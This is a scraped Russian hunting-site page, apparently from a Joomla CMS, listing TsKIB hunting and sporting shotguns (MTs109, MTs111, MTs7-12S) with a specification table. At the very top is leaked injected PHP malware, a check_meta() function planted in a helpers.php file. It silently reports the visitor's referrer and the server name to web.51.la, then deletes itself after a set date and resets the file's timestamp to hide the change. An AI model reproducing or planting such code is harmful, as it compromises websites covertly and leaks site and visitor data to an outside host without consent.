check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727465){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } МЦ Оружие высокого класса

Заказать Охотничий тур или Сафари

Трофейная Охота

Охотничьи собаки

Найти на нашем сайте

Производственные Компании

Сейчас Онлайн

Сейчас 3939 гостей онлайн

Звоните и узнавайте места

текущего сезона охоты

МЦ Оружие высокого класса

Предприятие ЦКИБ выполняет конструкторские разработки, исследования, испытания и изготавливает различные модели спортивно-охотничьего оружия высокого класса, боевого, служебного стрелкового оружия и средств ближнего боя, а также боеприпасы к ним.

МЦ109

Ружья охотничьи двуствольные Стволы отъемные расположены в вертикальной плоскости. Запирание осуществляется двумя рамками на три крюка. Ударные и спусковой механизм с перехватывателями курков, с одним универсальным спусковым крючком или двумя спусковыми крючками, со шнеллером или без него. Эжекторный механизм, неавтоматический предохранитель. Приклад и цевье из ореховой древесины. Различные сочетания стволов под дробные и пулевые охотничьи патроны. Прицелы открытый и оптический для ружей с нарезными стволами. Изготавливаются по индивидуальным заказам.

МЦ111

Ружья охотничьи двуствольные Стволы отъемные расположены в горизонтальной плоскости. Запирание осуществляется двумя рамками на три крюка. Ударный и спусковой механизмы с перехватывателями курков, с одним универсальным спусковым крючком или двумя спусковыми крючками, со шнеллерным механизмом или без него. Эжекторный механизм, автоматический предохранитель. Приклад и цевье из ореховой древесины. Различные сочетания стволов под дробовые и пулевые охотничьи патроны. Прицелы открытый и оптический для ружей с нарезными стволами. Изготавливаются по индивидуальному заказу.

МЦ7-12С

Ружье спортивное Ружье для стрельбы по движущимся мишеням в ходе спортивных соревнований, в том числе по "спортингу". Разработано на основе анализа опроса спортсменов. Стволы отъемные расположены в вертикальной плоскости. Внутренние поверхности каналов и патронников стволов не хромированы. Соединение стволов с коробкой осуществляется посредством ствольных крюков, оси шарнира, цевья и двух рамок запирания. Цевье закреплено на стволах защелкой. Ударный механизм с внутренними курками и спусковой механизм с одним универсальным спусковым крючком с переключателем очередности выстрелов, смонтированы на едином отдельном основании. Приклад и цевье из ореховой древесины. Приклад имеет регулируемый гребень. Выбор первого выстрела осуществляется перемещением кнопки переключателя вправо (нижний ствол), влево (верхний ствол). Курки взводятся одновременно в процессе отпирания и открывания стволов. Рабочее поджатие боевой пружины достигается при взведении курков в процессе открывания стволов. Гильзы выдвигаются из патронников стволов и выбрасываются отдельными выталкивателями.

 Калибр  12
 Длина ружья
 1245 мм
 Длина стволов
 810 мм

 Дульное сужение ствола

 
 Верхнего
 0,8 мм
 Нижнего

 Сменные дульные устройства

 0,3; 0,5; 0,8; 1,0 мм

 Масса
 Не более 3,65 кг

 

AddThis Social Bookmark Button
 

Добавить комментарий


Защитный код
Обновить